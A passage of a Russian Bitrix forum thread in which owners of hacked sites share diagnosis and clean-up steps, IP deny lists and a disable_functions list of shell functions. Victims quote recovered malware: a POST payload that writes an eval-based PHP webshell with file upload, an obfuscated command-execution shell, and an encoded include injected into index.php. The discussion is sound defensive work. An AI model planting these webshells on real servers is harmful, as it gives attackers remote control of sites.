Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#501

04.03.2023 15:16:29

У меня появилась аналогичная проблема как и у всех с битрик в конце февраля.
Удалил десятки тысяч файлов .htaccess. Потом решил восстановить из бэкапа когда их еще не было.
Но потом как и выше сказано 1-2 раза в сутки начали появляться рандомные файлы с вирусами.
Прочитав все этот форум, решил обновиться... Этого очень давно не делал. php 5.6 стоял.
Купил лицензию, обновил, не все модули хотят обновляться.
Но все же решил переключить на php 8 и вот что выдает

Код

[Error] 
Undefined constant "Bitrix\Main\Diag\ASSERT_QUIET_EVAL" (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/diag/exceptionhandler.php:244
#0: Bitrix\Main\Application->initializeExceptionHandler()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/lib/application.php:105
#1: Bitrix\Main\Application->initializeBasicKernel()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/start.php:164
#2: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:10
#3: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#4: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#5: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Как корректно обновиться?
Буду благодарен помощи

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#502

04.03.2023 15:45:53

Пробую еще как вариант пока тоже самое сделать на php 7, 7.2, 7.4 , результат не лучше

Код

[Error] Call to undefined function mysql_connect() (0)
/var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:19
#0: CDatabase->ConnectInternal()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/database.php:215
#1: CAllDatabase->DoConnect()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/database_mysql.php:74
#2: CDatabase->ForSql(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/general/main.php:4708
#3: CAllLanguage::GetList(NULL, NULL, array)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/classes/mysql/main.php:47
#4: CMain->GetLang()
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include.php:48
#5: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/include/prolog_admin_before.php:18
#6: require_once(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/modules/main/interface/desktop.php:2
#7: require(string)
   /var/www/u1315684/data/www/мой.сайт/bitrix/admin/index.php:2

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#503 04.03.2023 16:53:15 Зачем Вы сюда это выкинули? У Вас есть действующая лицензия, обратитесь в службу поддержки. Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 515353

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 04.03.2016

#504

04.03.2023 16:55:43

Ошибку с БД можно исправить, поправив 2 файла:

/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте
Код
define("BX_USE_MYSQLI", true);

Создание и поддержка сайтов: https://evgenydonich.ru

Пользователь 46525

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 03.08.2009

#505

04.03.2023 17:40:59

Цитата

написал:
Ошибку с БД можно исправить, поправив 2 файла:
/bitrix/.settings.php замените

Код
'className' => '\\Bitrix\\Main\\DB\\MysqlConnection'

на

Код
'className' => '\\Bitrix\\Main\\DB\\MysqliConnection'

/bitrix/php_interface/dbconn.php добавьте

Код
define( "BX_USE_MYSQLI" , true );

Спасибо! Получилось постепенно обновиться поочередно поднимая php

Пользователь 700243

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#506

04.03.2023 20:33:15

А у меня вот таким теперь весь лог забит, перебирают порты:

Код

[Sat Mar 04 14:53:03.782421 2023] [access_compat:error] [pid 11862] [client 188.x.x.x:45338] AH01797: client denied by server configuration: /www/x-x.com/public_html/
[Sat Mar 04 14:53:06.298049 2023] [access_compat:error] [pid 610] [client 188.xxx.x.x:45346] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/
[Sat Mar 04 14:53:34.792772 2023] [access_compat:error] [pid 11858] [client 188.x.x.x:52554] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/
[Sat Mar 04 14:53:34.977464 2023] [access_compat:error] [pid 27581] [client 188.x.x.x:52558] AH01797: client denied by server configuration: /www/x-x.com/public_html/, referer: http://x-x.com/04a9c540c814.php
[Sat Mar 04 14:53:35.135490 2023] [access_compat:error] [pid 14831] [client 188.x.x.x:52566] AH01797: client denied by server configuration: /www/x-x.com/public_html/04a9c540c814.php, referer: http://x-x.com/

Проблема в том, что 188.x.x.x — это адрес моего сервера, а referrer x-x.com — мой сайт. Типа подмена реферрера и IP? Левых процессов на сервере вроде не вижу, да и смысл ломится с сервера на него же тоже нет вроде бы. Нечисть с сайта вычистил, новая вроде не появляется. Заблочил пока по IP в htaccess сетку, которую камрады выше приводили, в htaccess:

Код

   Order Allow,Deny 
   Deny from 79.137.206.0/24
   Deny from 212.113.106.0/24
   Deny from 85.192.40.0/23
   Deny from 45.15.159.0/24
   Deny from 109.172.45.0/24
   Deny from 89.208.103.0/24
   Deny from 2a0e:d602:3::/48
   Deny from 79.137.207.0/24
   Deny from 2a0e:d602::/48
   Deny from 2a0e:d607::/48
   Deny from 2a0e:d602:2::/48
   Deny from 45.15.158.0/24
   Deny from 45.142.122.0/24
   Deny from 79.137.202.0/23
   Deny from 79.137.248.0/24
   Deny from 79.137.204.0/23
   Deny from 77.91.84.0/22
   Deny from 185.17.0.0/24
   Deny from 185.112.83.0/24
   Deny from 85.192.56.0/24
   Deny from 89.208.104.0/22
   Deny from 176.124.198.0/23
   Deny from 79.137.194.0/23
   Deny from 2a0e:d602:1::/48
   Deny from 212.113.119.0/24
   Deny from 77.91.78.0/24
   Deny from 45.138.74.0/24
   Deny from 80.85.241.0/24
   Deny from 85.192.63.0/24
   Deny from 5.252.118.0/24
   Deny from 212.113.116.0/24
   Deny from 185.229.65.0/24
   Deny from 78.153.130.0/24
   Deny from 185.174.137.0/24
   Deny from 185.106.94.0/24
   Deny from 77.73.131.0/24
   Deny from 91.193.43.0/24
   Deny from 79.137.196.0/22
   Deny from 194.26.229.0/24
   Deny from 195.20.16.0/24
   Deny from 185.229.66.0/24
   Deny from 89.185.85.0/24
   Deny from 185.174.136.0/24
   Deny from 2a0e:d606::/48
   Allow from all

зы С IP вроде бы разобрался — это глюк панели хостинга с криво настроенным mod_remote, но это не точно

Пользователь 10202

Заглянувший

Сообщений: 15 Баллов: 1 Регистрация: 18.03.2007

#507

05.03.2023 08:44:49

Кто-нибудь разобрался что дальше происходит после того, как приходит POST с таки содержимым на главную:

Код

(
   [bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/2a4e67218e9b.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');
)

Попытка поискать файлы с текстом bitrixxx, а также повторить запрос через Postman не создает файл.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#508

05.03.2023 14:30:07

Внимательно перечитал всю тему. Большое спасибо авторам постов, вся информация о том как ломают и что делать здесь есть. Сведу все еще раз для таких как я - впервые увидевших 1С Битрикс. Сейчас есть 2 основные уязвимости для необновленных Битриксов. Это vote и html_editor_action. Пока не обновитесь, удалите найденные бэкдоры ( spread.php, bx_root.php, агенты и т.д. ) и поставьте заглушки в файлы:
/bitrix/tools/html_editor_action.php
/bitrix/tools/vote/uf.php

Приводит ли к взлому найденная мной последовательность в логах php://filter/convert.iconv.UTF8.CSISO2022KR выясню позже. Может это действительно был какой-то запрос не для Битрикса.

Пользователь 45908

Заглянувший

Сообщений: 1 Регистрация: 27.03.2017

#509

05.03.2023 15:03:46

Спасибо всем за эту тему. Мои пять копеек: на одном старом сайте (из пяти пострадавших) нашёл ещё три "подарка" в папке .git.

Палятся по тому, что git gc начинает ругаться "bad sha1..." с путём к файлам .git/objects/6a/e93177.php .git/objects/7a/c13cf3.php
внутри что-то вот такое (оставлено самое интересное, хостер бегет эти вещи спалил своим скриптом проверки,кстати)

Код

$down = "which get;which wget;which lynx;which curl;which fetch;which links;";
            $aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
            $bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
            $fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
            if (isset($_POST['cmd'])) {
                echo '<pre>';
                $a1($_POST['cmd']);

и один "загрузчик фоточек для форума" в .git/objects/7a/c13cf3.php, внутри отличительные черты это строки

"648ae5b4a83b380bc7e163b26c28950b"

header('Content-Description: gallery Transfer');

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#510

06.03.2023 07:34:39

Всем привет, у меня вот такая шляпа в start.php, кусок выложу, а то там полотно целое. такого же не должно быть?

Код

<? $GLOBALS['____1911356488']= array(base64_decode('ZXJ'.'yb3JfcmVwb3J0a'.'W5'.'n'),base64_decode('c3'.'Vic3Ry'),base64_decode(''.'c3R'.'ybG'.'V'.'u'),
base64_decode('c'.'3RybGVu'),base64_decode('ZX'.'hwbG'.'9k'.'ZQ=='),base64_decode('bWljcm90a'.'W

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#511 06.03.2023 07:36:02 можно полный путь до start.php очень похоже на штатный Битриксовский обфускатор для кода где лицензионности касается Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#512

06.03.2023 07:38:43

Цитата
написал: можно полный путь до start.php очень похоже на штатный Битриксовский обфускатор для кода где лицензионности касается

/public_html/bitrix/modules/main/start.php

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#513

06.03.2023 07:42:12

Сделал поиск измененных файлов, .settings в корне с таким комментарием, почистил всю какашку, но .htaccess в корне, не дает выставить права на запись, просто на чтение сбрасывает, все файлы wp вычистил, которые судя по консоли даже не менялись

Код
RandsX aka T1kus_g0t

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#514

06.03.2023 07:47:03

Цитата

montpellier france написал:
Сделал поиск измененных файлов, .settings в корне с таким комментарием, почистил всю какашку, но .htaccess в корне, не дает выставить права на запись, просто на чтение сбрасывает, все файлы wp вычистил, которые судя по консоли даже не менялись

молодец!
а вопрос то в чём?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#515

06.03.2023 07:49:58

Цитата
montpellier france написал: /public_html/bitrix/modules/main/start.php

у меня такого мусора нет в этом файле - обратись в саппорт, пусть глянут
(ну и нам ответ перекинь плиз)

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#516

06.03.2023 08:20:30

Цитата

написал:

Цитата

молодец!
а вопрос то в чём?

почему .htaccess не дает поставить права на запись, хотя бы для вывода ошибок

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#517

06.03.2023 08:29:26

Цитата
montpellier france написал: .htaccess не дает поставить права на запись,

Проверьте список процессов, там должен быть php-скрипт (вроде бы lock666.php), который перезаписывает содержимое .htaccess.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#518

06.03.2023 08:39:16

Цитата
montpellier france написал: почему .htaccess не дает поставить права на запись, хотя бы для вывода ошибок

т.е. вы ставите на .htaccess права на запись и не получается? что за ошибку показывает?
вообще по идее вопрос по выставлению прав на файл - это в саппорт хостинга

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#519

06.03.2023 09:07:15

Цитата

написал:

Цитата
montpellier france написал: .htaccess не дает поставить права на запись,

ага, убил какашку эту

Пользователь 361229

Постоянный посетитель

Сообщений: 81 Баллов: 16 Регистрация: 18.07.2015

#520

06.03.2023 10:14:36

На VDS сервере установлено BitrxENV – работают два сайта на Битрикс, сломан один из них. Во всех папках сайта появляется .htaccess. которые не позволяют перейти по сайту дальше главной страницы. Такая же проблема с админкой.
При попытки восстановить взломанный сайт из резервной копии, удалил старые фалы - содержимое корневой папки сайт. Однако в пустой корневой папке появляются файлы .htaccess и index.php
Причем в начало файла index.php – встроена строка:

Код
<?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>

Полагаю восстановить сайт из рабочей резервной копии не получиться. Что делать?

Пользователь 7091602

Заглянувший

Сообщений: 8 Регистрация: 03.03.2023

#521

06.03.2023 10:23:16

Цитата

написал:
На VDS сервере установлено BitrxENV – работают два сайта на Битрикс, сломан один из них. Во всех папках сайта появляется .htaccess. которые не позволяют перейти по сайту дальше главной страницы. Такая же проблема с админкой.
При попытки восстановить взломанный сайт из резервной копии, удалил старые фалы - содержимое корневой папки сайт. Однако в пустой корневой папке появляются файлы .htaccess и index.php
Причем в начало файла index.php – встроена строка:

Код
<?php @ include ( "\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164" ); ?> <?

Содержимое .htaccess:

Скрытый текст Скрытый текст Скрытый текст Скрытый текст <IfModule mod_rewrite.c> Скрытый текст RewriteEngine On Скрытый текст RewriteBase / Скрытый текст RewriteRule ^index.php$ - [L] Скрытый текст RewriteCond %{REQUEST_FILENAME} !-f Скрытый текст RewriteCond %{REQUEST_FILENAME} !-d Скрытый текст RewriteRule . index.php [L] Скрытый текст </IfModule>
Полагаю восстановить сайт из рабочей резервной копии не получиться. Что делать?

тож такая шляпа в индексе валялась, и в индексе кодировка умерла - знаки вопросиков везде

Пользователь 177885

Заглянувший

Сообщений: 8 Регистрация: 02.04.2013

#522

06.03.2023 19:09:25

я на одном проете неделю назад боролся с этой хренью, сделал в php.ini:

disable_functions=eval,exec,passthru,shell_exec,system,proc_open,popen

+ в htaccess

Deny from 77.73.0.0/16

заблочил все великобританский (на сколько понял) айпишники.

на данный момент этот сайт жив. другие, где я не делал disable_functions - ломают, только сегодня руки дойдут до них

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#523

06.03.2023 19:16:10

Цитата
Роман Киланов, написал: disable_functions=eval,exec,passthru,shell_exec,system,proc_open,popen

При запрете eval, popen ошибки в самом bitrix не полезли? А какой версии у вас битрикс?

Пользователь 1183545 Заглянувший Сообщений: 5 Регистрация: 11.06.2017	#524 06.03.2023 19:22:36 Я удалил все файлы сайта и у меня всё равно создавался файл index.php и . htaccess.! Делаю вывод что взлом на уровне хостинга, а Битрикс не причём.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#525

06.03.2023 19:47:34

Цитата
Максим Комаров написал: Я удалил все файлы сайта и у меня всё равно создавался файл index.php и . htaccess.! Делаю вывод что взлом на уровне хостинга, а Битрикс не причём.

Рано вы такой вывод сделали.
Процесс уже в памяти сидит и восстанавливает инъекцию.
Вот если удалить все файлы и ребутнуть веб сервер (на шаред хостинге можно версию php туда сюда перекинуть, думаю эффект будет - или ТП попросить) тогда да, можно такой вывод сделать.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером